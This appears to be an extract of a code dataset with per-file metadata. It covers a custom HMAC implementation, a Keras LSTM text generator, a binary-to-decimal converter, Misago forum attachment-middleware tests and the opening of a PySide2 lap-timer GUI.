stdsha3hmac = hmac.new(key, message, digestmod='sha3_512')
mysha3hmac = HMAC(SHA3_512())
print(stdsha3hmac.hexdigest())
print(mysha3hmac(key, message).hexdigest)
| <filename>MyCrypto/hash/hmac.py
import sys
sys.path.append("../..")
import hmac
from MyCrypto.utils.bitarray import bitarray
from MyCrypto.hash.sha_utils import Digest
from MyCrypto.hash.sha1 import SHA1
from MyCrypto.hash.sha3 import SHA3_512
class HMAC:
def __init__(self, hash_func:callable):
self._hash_func = hash_func
self._n = hash_func.digest_size * 8
self._b = hash_func.hmac_size
self._ipad = bitarray.concat([bitarray(0x36, 8)]*(self._b//8))
self._opad = bitarray.concat([bitarray(0x5C, 8)]*(self._b//8))
def __call__(self, key:bytes, data:bytes) -> bytes:
# padding key
if len(key) > self._b//8:
key = self._hash_func(key).digest
key = bitarray.from_bytes(key)
k = bitarray.concat((key, bitarray(0, self._b-len(key))))
# process data
data = bitarray.from_bytes(data)
si = k ^ self._ipad
data = bitarray.concat((si, data))
data = self._hash(data)
so = k ^ self._opad
data = bitarray.concat((so, data))
data = self._hash(data)
return Digest(data.to_bytes())
def _hash(self, data:bitarray) -> bitarray:
data = self._hash_func(data.to_bytes()).digest
return bitarray.from_bytes(data)
if __name__ == '__main__':
message = b'The quick brown fox jumps over the lazy dog'
key = b'key'
stdsha1hmac = hmac.new(key, message, digestmod='sha1')
mysha1hmac = HMAC(SHA1())
print(stdsha1hmac.hexdigest())
print(mysha1hmac(key, message).hexdigest)
stdsha3hmac = hmac.new(key, message, digestmod='sha3_512')
mysha3hmac = HMAC(SHA3_512())
print(stdsha3hmac.hexdigest())
print(mysha3hmac(key, message).hexdigest)
| en | 0.15201 | # padding key # process data | 2.756606 | 3 |
BBC-news-data/software-stack/model.py | navyamehta/economic-data-NLP | 0 | 6612363 | <filename>BBC-news-data/software-stack/model.py
import tensorflow as tf
import tensorflow_hub as hub
import numpy as np
import os
import re
from tensorflow.keras.layers import LSTM, TimeDistributed, Dense, Bidirectional, Input, Embedding
from tensorflow.keras.layers import Dropout, Conv1D, Flatten
from tensorflow.keras.layers import Concatenate, Dot, Activation
import collections
import nltk.stem
class Model():
## FIRST-ORDER FUNCTIONS
def __init__(self, modelpath="../data/newspred.h5", usepath="./universal-sentence-encoder_4"):
self.embed = hub.load(usepath)
self.vocab = np.array([char for char in " abcdefghijklmnopqrstuvwxyz"])
self.model = self.model_maker()
self.model.load_weights(modelpath)
def generate(self, text, numwords, k=3):
text = self.text_cleaner(text)
if (len(text)<100): return None, None, False
state = self.embed([text]).numpy()
start = np.zeros((1,100))
start[0] = [np.where(self.vocab==r)[0][0] for r in text[:100]]
stim, seq = text[:100], ""
wordsgen = 0
while (wordsgen<numwords):
maxval, beamseq = self.beamer(start.copy(), state.copy(), k)
seq+="".join([self.vocab[np.int(i)] for i in beamseq])
start[0,:-k] = start[0,k:]
start[0,-k:] = beamseq
wordsgen+=np.sum(np.array(beamseq)==0)
#Incase we overshoot numwords with numerous words in a single beam
seq = " ".join(seq.split()[:wordsgen])
return stim, seq, True
## SECOND-ORDER FUNCTONS
def model_maker(self, latentdim=512):
tf.keras.backend.clear_session()
state = Input(shape=(latentdim,))
decinput = Input(shape=(100,))
embed_layer = Embedding(self.vocab.shape[0], self.vocab.shape[0], weights=[np.eye(self.vocab.shape[0])],
trainable=False, input_length=100)
embedval = embed_layer(decinput)
lstm_layer1 = LSTM(latentdim, return_sequences=True, return_state=True)
lstm1val, _, _ = lstm_layer1(embedval, initial_state=[state, state])
lstm1val = Dropout(0.2)(lstm1val)
lstm_layer2 = Bidirectional(LSTM(latentdim, return_sequences=True, return_state=True))
lstm2val, _, _, _, _ = lstm_layer2(lstm1val, initial_state=[state, state, state, state])
lstm2val = Dropout(0.2)(lstm2val)
lstm_layer3 = LSTM(latentdim, return_sequences=False, return_state=True)
lstm3val, _, _ = lstm_layer3(lstm2val, initial_state=[state, state])
lstm3val = Dropout(0.2)(lstm3val)
dense_layer = Dense(self.vocab.shape[0], activation="softmax")
output = dense_layer(lstm3val)
mdl = tf.keras.models.Model(inputs=[decinput, state], outputs=output)
mdl.compile(optimizer="adam", loss="categorical_crossentropy")
return mdl
def text_cleaner(self, s):
s = re.sub("\n"," ", re.sub("[,<>@#\'\")(]","", s))
s = re.sub("[.?%$0-9!&*+-/:;<=\[\]£]"," ", s)
s = re.sub("[^ a-zA-Z]","",s)
s = " ".join(np.vectorize(lambda s: s if len(s)<=3 else nltk.stem.WordNetLemmatizer().lemmatize(s))
(np.array(s.split())))
return s.lower()
def beamer(self, start, state, k, toplimit=10):
returnvals = collections.deque()
pred = self.model.predict([start, state])
if k==1:
returnvals.append(np.argmax(pred[0]))
return np.max(pred[0]), returnvals
else:
maxval, beamseq = None, None
topchoices = np.argsort(pred[0])[-toplimit:]
for j in topchoices:
chars = start.copy()
chars[0,:-1] = chars[0,1:]
chars[0,-1] = j
val, shortseq = self.beamer(chars, state, k-1)
if (not maxval) or ((val*pred[0,j])>maxval):
maxval = val*pred[0,j]
beamseq = shortseq
beamseq.appendleft(j)
return maxval, beamseq
| <filename>BBC-news-data/software-stack/model.py
import tensorflow as tf
import tensorflow_hub as hub
import numpy as np
import os
import re
from tensorflow.keras.layers import LSTM, TimeDistributed, Dense, Bidirectional, Input, Embedding
from tensorflow.keras.layers import Dropout, Conv1D, Flatten
from tensorflow.keras.layers import Concatenate, Dot, Activation
import collections
import nltk.stem
class Model():
    """Character-level news-text generator.

    A Universal Sentence Encoder embedding of the full input text seeds the
    initial state of a stacked-LSTM decoder that emits one character at a
    time over a 27-symbol vocabulary (space + 'a'-'z'), chosen by beam
    search.
    """
    ## FIRST-ORDER FUNCTIONS
    def __init__(self, modelpath="../data/newspred.h5", usepath="./universal-sentence-encoder_4"):
        """Load the sentence encoder and the pretrained decoder weights."""
        self.embed = hub.load(usepath)
        # Index 0 is the space character, 1-26 map to 'a'-'z'.
        self.vocab = np.array([char for char in " abcdefghijklmnopqrstuvwxyz"])
        self.model = self.model_maker()
        self.model.load_weights(modelpath)
    def generate(self, text, numwords, k=3):
        """Generate roughly `numwords` words of text conditioned on `text`.

        Returns (stimulus, generated, ok); ok is False when the cleaned
        input is shorter than the 100-character decoder window.
        """
        text = self.text_cleaner(text)
        if (len(text) < 100):
            return None, None, False
        state = self.embed([text]).numpy()
        start = np.zeros((1, 100))
        # Seed the decoder window with the first 100 cleaned characters.
        start[0] = [np.where(self.vocab == r)[0][0] for r in text[:100]]
        stim, seq = text[:100], ""
        wordsgen = 0
        while (wordsgen < numwords):
            maxval, beamseq = self.beamer(start.copy(), state.copy(), k)
            # Bug fix: np.int was removed in NumPy 1.24; the built-in int()
            # is the documented replacement.
            seq += "".join([self.vocab[int(i)] for i in beamseq])
            # Slide the decoder window left by k and append the new symbols.
            start[0, :-k] = start[0, k:]
            start[0, -k:] = beamseq
            # Symbol 0 is the space character, so each 0 completes a word.
            wordsgen += np.sum(np.array(beamseq) == 0)
        # Incase we overshoot numwords with numerous words in a single beam
        seq = " ".join(seq.split()[:wordsgen])
        return stim, seq, True
    ## SECOND-ORDER FUNCTIONS
    def model_maker(self, latentdim=512):
        """Build the character decoder: one-hot embedding -> 3 stacked LSTMs -> softmax.

        The (latentdim,) sentence-embedding input is fed in as the initial
        hidden and cell state of every LSTM layer.  Returns the compiled
        Keras model; weights are loaded separately.
        """
        tf.keras.backend.clear_session()
        # Sentence-embedding input, used as LSTM initial state below.
        state = Input(shape=(latentdim,))
        # 100-character window of vocabulary indices.
        decinput = Input(shape=(100,))
        # Identity weights + trainable=False make this a frozen one-hot encoding.
        embed_layer = Embedding(self.vocab.shape[0], self.vocab.shape[0], weights=[np.eye(self.vocab.shape[0])],
                                trainable=False, input_length=100)
        embedval = embed_layer(decinput)
        lstm_layer1 = LSTM(latentdim, return_sequences=True, return_state=True)
        lstm1val, _, _ = lstm_layer1(embedval, initial_state=[state, state])
        lstm1val = Dropout(0.2)(lstm1val)
        # Bidirectional with return_state=True yields output + 4 states (h/c per direction).
        lstm_layer2 = Bidirectional(LSTM(latentdim, return_sequences=True, return_state=True))
        lstm2val, _, _, _, _ = lstm_layer2(lstm1val, initial_state=[state, state, state, state])
        lstm2val = Dropout(0.2)(lstm2val)
        lstm_layer3 = LSTM(latentdim, return_sequences=False, return_state=True)
        lstm3val, _, _ = lstm_layer3(lstm2val, initial_state=[state, state])
        lstm3val = Dropout(0.2)(lstm3val)
        # Probability distribution over the vocabulary for the next character.
        dense_layer = Dense(self.vocab.shape[0], activation="softmax")
        output = dense_layer(lstm3val)
        mdl = tf.keras.models.Model(inputs=[decinput, state], outputs=output)
        mdl.compile(optimizer="adam", loss="categorical_crossentropy")
        return mdl
    def text_cleaner(self, s):
        """Lower-case *s*, strip everything but letters and spaces, and
        lemmatize words longer than three characters."""
        s = re.sub("\n", " ", re.sub("[,<>@#\'\")(]", "", s))
        s = re.sub("[.?%$0-9!&*+-/:;<=\[\]£]", " ", s)
        s = re.sub("[^ a-zA-Z]", "", s)
        # Bug fix: np.vectorize raises on zero-size input, so text that the
        # regexes reduced to nothing used to crash; a plain loop handles [].
        # The WordNet lemmatizer is also built lazily, once, instead of
        # being re-instantiated for every word.
        lemmatize = None
        words = []
        for word in s.split():
            if len(word) <= 3:
                words.append(word)
            else:
                if lemmatize is None:
                    lemmatize = nltk.stem.WordNetLemmatizer().lemmatize
                words.append(lemmatize(word))
        return " ".join(words).lower()
    def beamer(self, start, state, k, toplimit=10):
        """Depth-k beam search: return (probability, deque of k symbol ids).

        `start` is the (1, 100) decoder window and `state` the sentence
        embedding; `toplimit` bounds the branching factor at each level.
        """
        returnvals = collections.deque()
        pred = self.model.predict([start, state])
        if k == 1:
            # Base case: greedily take the single most probable symbol.
            returnvals.append(np.argmax(pred[0]))
            return np.max(pred[0]), returnvals
        else:
            maxval, beamseq = None, None
            topchoices = np.argsort(pred[0])[-toplimit:]
            for j in topchoices:
                # Shift the window left one step and append candidate j.
                chars = start.copy()
                chars[0, :-1] = chars[0, 1:]
                chars[0, -1] = j
                # Bug fix: propagate toplimit; it was silently reset to the
                # default on every recursive call.
                val, shortseq = self.beamer(chars, state, k - 1, toplimit)
                # Bug fix: `not maxval` also triggered when maxval was 0.0,
                # letting a later candidate overwrite an already-stored best.
                if (maxval is None) or ((val * pred[0, j]) > maxval):
                    maxval = val * pred[0, j]
                    beamseq = shortseq
                    beamseq.appendleft(j)
            return maxval, beamseq
| en | 0.683603 | ## FIRST-ORDER FUNCTIONS #Incase we overshoot numwords with numerous words in a single beam ## SECOND-ORDER FUNCTONS #\'\")(]","", s)) | 2.374935 | 2 |
binary_to_decimal_converter.py | Pablo-RodriguezOrtiz/Small-projects | 0 | 6612364 | # ------------------------------------------------------------------------
#
#
# Made with python 3.8.8
#
#
# ------------------------------------------------------------------------
def bdecimal(binario=None):
    """Convierte un numeral binario a decimal.

    Backward compatible: llamada sin argumento, pide el número por stdin
    igual que antes.  Con el argumento opcional `binario` se puede usar
    sin interacción.

    Lanza ValueError si la cadena no es un binario válido (la versión
    anterior aceptaba en silencio los dígitos 2-9 y devolvía un resultado
    incorrecto).
    """
    if binario is None:
        binario = input("Introduce el numero binario para convertirlo en decimal: ")
    # int(x, 2) valida y convierte en un solo paso, en vez del bucle
    # manual de potencias de dos.
    valor = int(binario, 2)
    return "Tu número en base decimal es " + str(valor)
| # ------------------------------------------------------------------------
#
#
# Made with python 3.8.8
#
#
# ------------------------------------------------------------------------
def bdecimal(binario=None):
    """Convierte un numeral binario a decimal.

    Backward compatible: llamada sin argumento, pide el número por stdin
    igual que antes.  Con el argumento opcional `binario` se puede usar
    sin interacción.

    Lanza ValueError si la cadena no es un binario válido (la versión
    anterior aceptaba en silencio los dígitos 2-9 y devolvía un resultado
    incorrecto).
    """
    if binario is None:
        binario = input("Introduce el numero binario para convertirlo en decimal: ")
    # int(x, 2) valida y convierte en un solo paso, en vez del bucle
    # manual de potencias de dos.
    valor = int(binario, 2)
    return "Tu número en base decimal es " + str(valor)
| en | 0.169009 | # ------------------------------------------------------------------------ # # # Made with python 3.8.8 # # # ------------------------------------------------------------------------ | 3.999164 | 4 |
misago/threads/tests/test_attachments_middleware.py | HenryChenV/iJiangNan | 1 | 6612365 | from rest_framework import serializers
from misago.acl.testutils import override_acl
from misago.categories.models import Category
from misago.conf import settings
from misago.threads import testutils
from misago.threads.api.postingendpoint import PostingEndpoint
from misago.threads.api.postingendpoint.attachments import (
AttachmentsMiddleware, validate_attachments_count)
from misago.threads.models import Attachment, AttachmentType
from misago.users.testutils import AuthenticatedUserTestCase
class RequestMock(object):
    """Minimal request stand-in: only the ``data`` attribute is consumed."""
    def __init__(self, data=None):
        # Any falsy payload (None, {}, []) collapses to an empty dict.
        if data:
            self.data = data
        else:
            self.data = {}
class AttachmentsMiddlewareTests(AuthenticatedUserTestCase):
    """Integration tests for AttachmentsMiddleware.

    Covers permission gating (use_this_middleware, delete rights), payload
    validation, and how attachments are added to, removed from, kept on and
    re-assigned between posts during START/EDIT posting.
    """
    def setUp(self):
        # Build a thread with one post and give the user a baseline ACL
        # that merely permits uploads.
        super(AttachmentsMiddlewareTests, self).setUp()
        self.category = Category.objects.get(slug='first-category')
        self.thread = testutils.post_thread(category=self.category)
        self.post = self.thread.first_post
        self.post.update_fields = []
        self.override_acl()
        self.filetype = AttachmentType.objects.order_by('id').last()
    def override_acl(self, new_acl=None):
        # Helper: replace the user's ACL; default just allows uploads.
        override_acl(self.user, new_acl or {'max_attachment_size': 1024})
    def mock_attachment(self, user=True, post=None):
        # Helper: create a DB attachment; user=False simulates another
        # user's (anonymised) upload, post=None leaves it orphaned.
        return Attachment.objects.create(
            secret=Attachment.generate_new_secret(),
            filetype=self.filetype,
            post=post,
            size=1000,
            uploader=self.user if user else None,
            uploader_name=self.user.username,
            uploader_slug=self.user.slug,
            uploader_ip='127.0.0.1',
            filename='testfile_{}.zip'.format(Attachment.objects.count() + 1),
        )
    def test_use_this_middleware(self):
        """use_this_middleware returns False if we can't upload attachments"""
        middleware = AttachmentsMiddleware(user=self.user)
        self.override_acl({'max_attachment_size': 0})
        self.assertFalse(middleware.use_this_middleware())
        self.override_acl({'max_attachment_size': 1024})
        self.assertTrue(middleware.use_this_middleware())
    def test_middleware_is_optional(self):
        """middleware is optional"""
        INPUTS = [{}, {'attachments': []}]
        for test_input in INPUTS:
            middleware = AttachmentsMiddleware(
                request=RequestMock(test_input),
                mode=PostingEndpoint.START,
                user=self.user,
                post=self.post,
            )
            serializer = middleware.get_serializer()
            self.assertTrue(serializer.is_valid())
    def test_middleware_validates_ids(self):
        """middleware validates attachments ids"""
        INPUTS = ['none', ['a', 'b', 123], range(settings.MISAGO_POST_ATTACHMENTS_LIMIT + 1)]
        for test_input in INPUTS:
            middleware = AttachmentsMiddleware(
                request=RequestMock({
                    'attachments': test_input
                }),
                mode=PostingEndpoint.START,
                user=self.user,
                post=self.post,
            )
            serializer = middleware.get_serializer()
            self.assertFalse(serializer.is_valid(), "%r shouldn't validate" % test_input)
    def test_get_initial_attachments(self):
        """get_initial_attachments returns list of attachments already existing on post"""
        middleware = AttachmentsMiddleware(
            request=RequestMock(),
            mode=PostingEndpoint.EDIT,
            user=self.user,
            post=self.post,
        )
        serializer = middleware.get_serializer()
        attachments = serializer.get_initial_attachments(
            middleware.mode, middleware.user, middleware.post
        )
        self.assertEqual(attachments, [])
        attachment = self.mock_attachment(post=self.post)
        attachments = serializer.get_initial_attachments(
            middleware.mode, middleware.user, middleware.post
        )
        self.assertEqual(attachments, [attachment])
    def test_get_new_attachments(self):
        """get_new_attachments returns list of user's orphaned attachments matching given ids"""
        middleware = AttachmentsMiddleware(
            request=RequestMock(),
            mode=PostingEndpoint.EDIT,
            user=self.user,
            post=self.post,
        )
        serializer = middleware.get_serializer()
        attachments = serializer.get_new_attachments(middleware.user, [1, 2, 3])
        self.assertEqual(attachments, [])
        attachment = self.mock_attachment()
        attachments = serializer.get_new_attachments(middleware.user, [attachment.pk])
        self.assertEqual(attachments, [attachment])
        # only own orphaned attachments may be assigned to posts
        other_user_attachment = self.mock_attachment(user=False)
        attachments = serializer.get_new_attachments(middleware.user, [other_user_attachment.pk])
        self.assertEqual(attachments, [])
    def test_cant_delete_attachment(self):
        """middleware validates if we have permission to delete other users attachments"""
        self.override_acl({
            'max_attachment_size': 1024,
            'can_delete_other_users_attachments': False,
        })
        attachment = self.mock_attachment(user=False, post=self.post)
        self.assertIsNone(attachment.uploader)
        serializer = AttachmentsMiddleware(
            request=RequestMock({
                'attachments': []
            }),
            mode=PostingEndpoint.EDIT,
            user=self.user,
            post=self.post,
        ).get_serializer()
        self.assertFalse(serializer.is_valid())
    def test_add_attachments(self):
        """middleware adds attachments to post"""
        attachments = [
            self.mock_attachment(),
            self.mock_attachment(),
        ]
        middleware = AttachmentsMiddleware(
            request=RequestMock({
                'attachments': [a.pk for a in attachments]
            }),
            mode=PostingEndpoint.EDIT,
            user=self.user,
            post=self.post,
        )
        serializer = middleware.get_serializer()
        self.assertTrue(serializer.is_valid())
        middleware.save(serializer)
        # attachments were associated with post
        self.assertEqual(self.post.update_fields, ['attachments_cache'])
        self.assertEqual(self.post.attachment_set.count(), 2)
        attachments_filenames = list(reversed([a.filename for a in attachments]))
        self.assertEqual([a['filename'] for a in self.post.attachments_cache],
                         attachments_filenames)
    def test_remove_attachments(self):
        """middleware removes attachment from post and db"""
        attachments = [
            self.mock_attachment(post=self.post),
            self.mock_attachment(post=self.post),
        ]
        middleware = AttachmentsMiddleware(
            request=RequestMock({
                'attachments': [attachments[0].pk]
            }),
            mode=PostingEndpoint.EDIT,
            user=self.user,
            post=self.post,
        )
        serializer = middleware.get_serializer()
        self.assertTrue(serializer.is_valid())
        middleware.save(serializer)
        # attachments were associated with post
        self.assertEqual(self.post.update_fields, ['attachments_cache'])
        self.assertEqual(self.post.attachment_set.count(), 1)
        self.assertEqual(Attachment.objects.count(), 1)
        attachments_filenames = [attachments[0].filename]
        self.assertEqual([a['filename'] for a in self.post.attachments_cache],
                         attachments_filenames)
    def test_steal_attachments(self):
        """middleware validates if attachments are already assigned to other posts"""
        other_post = testutils.reply_thread(self.thread)
        attachments = [
            self.mock_attachment(post=other_post),
            self.mock_attachment(),
        ]
        middleware = AttachmentsMiddleware(
            request=RequestMock({
                'attachments': [attachments[0].pk, attachments[1].pk]
            }),
            mode=PostingEndpoint.EDIT,
            user=self.user,
            post=self.post,
        )
        serializer = middleware.get_serializer()
        self.assertTrue(serializer.is_valid())
        middleware.save(serializer)
        # only unassociated attachment was associated with post
        self.assertEqual(self.post.update_fields, ['attachments_cache'])
        self.assertEqual(self.post.attachment_set.count(), 1)
        self.assertEqual(Attachment.objects.get(pk=attachments[0].pk).post, other_post)
        self.assertEqual(Attachment.objects.get(pk=attachments[1].pk).post, self.post)
    def test_edit_attachments(self):
        """middleware removes and adds attachments to post"""
        attachments = [
            self.mock_attachment(post=self.post),
            self.mock_attachment(post=self.post),
            self.mock_attachment(),
        ]
        middleware = AttachmentsMiddleware(
            request=RequestMock({
                'attachments': [attachments[0].pk, attachments[2].pk]
            }),
            mode=PostingEndpoint.EDIT,
            user=self.user,
            post=self.post,
        )
        serializer = middleware.get_serializer()
        self.assertTrue(serializer.is_valid())
        middleware.save(serializer)
        # attachments were associated with post
        self.assertEqual(self.post.update_fields, ['attachments_cache'])
        self.assertEqual(self.post.attachment_set.count(), 2)
        attachments_filenames = [attachments[2].filename, attachments[0].filename]
        self.assertEqual([a['filename'] for a in self.post.attachments_cache],
                         attachments_filenames)
class ValidateAttachmentsCountTests(AuthenticatedUserTestCase):
    def test_validate_attachments_count(self):
        """too large count of attachments is rejected"""
        limit = settings.MISAGO_POST_ATTACHMENTS_LIMIT
        # exactly at the limit: accepted
        validate_attachments_count(range(limit))
        # one over the limit: rejected
        with self.assertRaises(serializers.ValidationError):
            validate_attachments_count(range(limit + 1))
| from rest_framework import serializers
from misago.acl.testutils import override_acl
from misago.categories.models import Category
from misago.conf import settings
from misago.threads import testutils
from misago.threads.api.postingendpoint import PostingEndpoint
from misago.threads.api.postingendpoint.attachments import (
AttachmentsMiddleware, validate_attachments_count)
from misago.threads.models import Attachment, AttachmentType
from misago.users.testutils import AuthenticatedUserTestCase
class RequestMock(object):
    """Minimal request stand-in: only the ``data`` attribute is consumed."""
    def __init__(self, data=None):
        # Any falsy payload (None, {}, []) collapses to an empty dict.
        if data:
            self.data = data
        else:
            self.data = {}
class AttachmentsMiddlewareTests(AuthenticatedUserTestCase):
    """Integration tests for AttachmentsMiddleware.

    Covers permission gating (use_this_middleware, delete rights), payload
    validation, and how attachments are added to, removed from, kept on and
    re-assigned between posts during START/EDIT posting.
    """
    def setUp(self):
        # Build a thread with one post and give the user a baseline ACL
        # that merely permits uploads.
        super(AttachmentsMiddlewareTests, self).setUp()
        self.category = Category.objects.get(slug='first-category')
        self.thread = testutils.post_thread(category=self.category)
        self.post = self.thread.first_post
        self.post.update_fields = []
        self.override_acl()
        self.filetype = AttachmentType.objects.order_by('id').last()
    def override_acl(self, new_acl=None):
        # Helper: replace the user's ACL; default just allows uploads.
        override_acl(self.user, new_acl or {'max_attachment_size': 1024})
    def mock_attachment(self, user=True, post=None):
        # Helper: create a DB attachment; user=False simulates another
        # user's (anonymised) upload, post=None leaves it orphaned.
        return Attachment.objects.create(
            secret=Attachment.generate_new_secret(),
            filetype=self.filetype,
            post=post,
            size=1000,
            uploader=self.user if user else None,
            uploader_name=self.user.username,
            uploader_slug=self.user.slug,
            uploader_ip='127.0.0.1',
            filename='testfile_{}.zip'.format(Attachment.objects.count() + 1),
        )
    def test_use_this_middleware(self):
        """use_this_middleware returns False if we can't upload attachments"""
        middleware = AttachmentsMiddleware(user=self.user)
        self.override_acl({'max_attachment_size': 0})
        self.assertFalse(middleware.use_this_middleware())
        self.override_acl({'max_attachment_size': 1024})
        self.assertTrue(middleware.use_this_middleware())
    def test_middleware_is_optional(self):
        """middleware is optional"""
        INPUTS = [{}, {'attachments': []}]
        for test_input in INPUTS:
            middleware = AttachmentsMiddleware(
                request=RequestMock(test_input),
                mode=PostingEndpoint.START,
                user=self.user,
                post=self.post,
            )
            serializer = middleware.get_serializer()
            self.assertTrue(serializer.is_valid())
    def test_middleware_validates_ids(self):
        """middleware validates attachments ids"""
        INPUTS = ['none', ['a', 'b', 123], range(settings.MISAGO_POST_ATTACHMENTS_LIMIT + 1)]
        for test_input in INPUTS:
            middleware = AttachmentsMiddleware(
                request=RequestMock({
                    'attachments': test_input
                }),
                mode=PostingEndpoint.START,
                user=self.user,
                post=self.post,
            )
            serializer = middleware.get_serializer()
            self.assertFalse(serializer.is_valid(), "%r shouldn't validate" % test_input)
    def test_get_initial_attachments(self):
        """get_initial_attachments returns list of attachments already existing on post"""
        middleware = AttachmentsMiddleware(
            request=RequestMock(),
            mode=PostingEndpoint.EDIT,
            user=self.user,
            post=self.post,
        )
        serializer = middleware.get_serializer()
        attachments = serializer.get_initial_attachments(
            middleware.mode, middleware.user, middleware.post
        )
        self.assertEqual(attachments, [])
        attachment = self.mock_attachment(post=self.post)
        attachments = serializer.get_initial_attachments(
            middleware.mode, middleware.user, middleware.post
        )
        self.assertEqual(attachments, [attachment])
    def test_get_new_attachments(self):
        """get_new_attachments returns list of user's orphaned attachments matching given ids"""
        middleware = AttachmentsMiddleware(
            request=RequestMock(),
            mode=PostingEndpoint.EDIT,
            user=self.user,
            post=self.post,
        )
        serializer = middleware.get_serializer()
        attachments = serializer.get_new_attachments(middleware.user, [1, 2, 3])
        self.assertEqual(attachments, [])
        attachment = self.mock_attachment()
        attachments = serializer.get_new_attachments(middleware.user, [attachment.pk])
        self.assertEqual(attachments, [attachment])
        # only own orphaned attachments may be assigned to posts
        other_user_attachment = self.mock_attachment(user=False)
        attachments = serializer.get_new_attachments(middleware.user, [other_user_attachment.pk])
        self.assertEqual(attachments, [])
    def test_cant_delete_attachment(self):
        """middleware validates if we have permission to delete other users attachments"""
        self.override_acl({
            'max_attachment_size': 1024,
            'can_delete_other_users_attachments': False,
        })
        attachment = self.mock_attachment(user=False, post=self.post)
        self.assertIsNone(attachment.uploader)
        serializer = AttachmentsMiddleware(
            request=RequestMock({
                'attachments': []
            }),
            mode=PostingEndpoint.EDIT,
            user=self.user,
            post=self.post,
        ).get_serializer()
        self.assertFalse(serializer.is_valid())
    def test_add_attachments(self):
        """middleware adds attachments to post"""
        attachments = [
            self.mock_attachment(),
            self.mock_attachment(),
        ]
        middleware = AttachmentsMiddleware(
            request=RequestMock({
                'attachments': [a.pk for a in attachments]
            }),
            mode=PostingEndpoint.EDIT,
            user=self.user,
            post=self.post,
        )
        serializer = middleware.get_serializer()
        self.assertTrue(serializer.is_valid())
        middleware.save(serializer)
        # attachments were associated with post
        self.assertEqual(self.post.update_fields, ['attachments_cache'])
        self.assertEqual(self.post.attachment_set.count(), 2)
        attachments_filenames = list(reversed([a.filename for a in attachments]))
        self.assertEqual([a['filename'] for a in self.post.attachments_cache],
                         attachments_filenames)
    def test_remove_attachments(self):
        """middleware removes attachment from post and db"""
        attachments = [
            self.mock_attachment(post=self.post),
            self.mock_attachment(post=self.post),
        ]
        middleware = AttachmentsMiddleware(
            request=RequestMock({
                'attachments': [attachments[0].pk]
            }),
            mode=PostingEndpoint.EDIT,
            user=self.user,
            post=self.post,
        )
        serializer = middleware.get_serializer()
        self.assertTrue(serializer.is_valid())
        middleware.save(serializer)
        # attachments were associated with post
        self.assertEqual(self.post.update_fields, ['attachments_cache'])
        self.assertEqual(self.post.attachment_set.count(), 1)
        self.assertEqual(Attachment.objects.count(), 1)
        attachments_filenames = [attachments[0].filename]
        self.assertEqual([a['filename'] for a in self.post.attachments_cache],
                         attachments_filenames)
    def test_steal_attachments(self):
        """middleware validates if attachments are already assigned to other posts"""
        other_post = testutils.reply_thread(self.thread)
        attachments = [
            self.mock_attachment(post=other_post),
            self.mock_attachment(),
        ]
        middleware = AttachmentsMiddleware(
            request=RequestMock({
                'attachments': [attachments[0].pk, attachments[1].pk]
            }),
            mode=PostingEndpoint.EDIT,
            user=self.user,
            post=self.post,
        )
        serializer = middleware.get_serializer()
        self.assertTrue(serializer.is_valid())
        middleware.save(serializer)
        # only unassociated attachment was associated with post
        self.assertEqual(self.post.update_fields, ['attachments_cache'])
        self.assertEqual(self.post.attachment_set.count(), 1)
        self.assertEqual(Attachment.objects.get(pk=attachments[0].pk).post, other_post)
        self.assertEqual(Attachment.objects.get(pk=attachments[1].pk).post, self.post)
    def test_edit_attachments(self):
        """middleware removes and adds attachments to post"""
        attachments = [
            self.mock_attachment(post=self.post),
            self.mock_attachment(post=self.post),
            self.mock_attachment(),
        ]
        middleware = AttachmentsMiddleware(
            request=RequestMock({
                'attachments': [attachments[0].pk, attachments[2].pk]
            }),
            mode=PostingEndpoint.EDIT,
            user=self.user,
            post=self.post,
        )
        serializer = middleware.get_serializer()
        self.assertTrue(serializer.is_valid())
        middleware.save(serializer)
        # attachments were associated with post
        self.assertEqual(self.post.update_fields, ['attachments_cache'])
        self.assertEqual(self.post.attachment_set.count(), 2)
        attachments_filenames = [attachments[2].filename, attachments[0].filename]
        self.assertEqual([a['filename'] for a in self.post.attachments_cache],
                         attachments_filenames)
class ValidateAttachmentsCountTests(AuthenticatedUserTestCase):
    def test_validate_attachments_count(self):
        """too large count of attachments is rejected"""
        limit = settings.MISAGO_POST_ATTACHMENTS_LIMIT
        # exactly at the limit: accepted
        validate_attachments_count(range(limit))
        # one over the limit: rejected
        with self.assertRaises(serializers.ValidationError):
            validate_attachments_count(range(limit + 1))
| en | 0.958346 | use_this_middleware returns False if we can't upload attachments middleware is optional middleware validates attachments ids get_initial_attachments returns list of attachments already existing on post get_initial_attachments returns list of attachments already existing on post # only own orphaned attachments may be assigned to posts middleware validates if we have permission to delete other users attachments middleware adds attachments to post # attachments were associated with post middleware removes attachment from post and db # attachments were associated with post middleware validates if attachments are already assigned to other posts # only unassociated attachment was associated with post middleware removes and adds attachments to post # attachments were associated with post too large count of attachments is rejected | 2.024463 | 2 |
MainGUI.py | JamesxL/TrackLogger | 0 | 6612366 | <gh_stars>0
from PySide2.QtCore import * # type: ignore
from PySide2.QtGui import * # type: ignore
from PySide2.QtWidgets import * # type: ignore
import sys
import os
from Drivers.OmeTracker import OmeTracker
import numpy as np
import datetime
import time
import csv
from GUI.MainScreen import Ui_MainWindow as MainGUI
from GUI.ConfigPop import Ui_ConfigPop as ConfigGUI
class MainWindow(QMainWindow, MainGUI):
    """Main track-logger screen: lap timer, GPS/CAN status and logging UI."""
    def __init__(self) -> None:
        super().__init__()
        self.setupUi(self)
        self.system = os.uname().nodename
        self.Tracker = OmeTracker()
        # set up subwindows/popups
        self.ConfigWindow = ConfigWindow()
        # set up buttons
        self.StartTimerBtn.clicked.connect(self.StartTiming)
        self.StopTimerBtn.clicked.connect(self.StopTiming)
        self.ConfigBtn.clicked.connect(self.OpenConfig)
        # 20 ms refresh for the lap-time display.
        self.ClockUpdater = QTimer(self)
        self.ClockUpdater.timeout.connect(self.UpdateClock)
        self.ClockUpdater.setInterval(20)
        self.ClockUpdater.start()
        # 100 ms refresh for the GPS/CAN/logging status indicators.
        self.SensorUpdater = QTimer(self)
        self.SensorUpdater.timeout.connect(self.UpdateSensor)
        self.SensorUpdater.start(100)
        self.RunMode = 'circuit'
        self.ModeRunner = QTimer(self)
        self.ModeRunner.setInterval(5)
        self.ConfigureRunMode()
        self.Tracker.start_sys_logging()
        self.StartTiming()
        # Fullscreen only on the in-car Raspberry Pi.
        if self.system == 'raspberrypi':
            self.showFullScreen()
        else:
            self.show()
    def StartTiming(self):
        """Start the lap timer and the run-mode polling loop."""
        self.Tracker.O_Timer.start_timer()
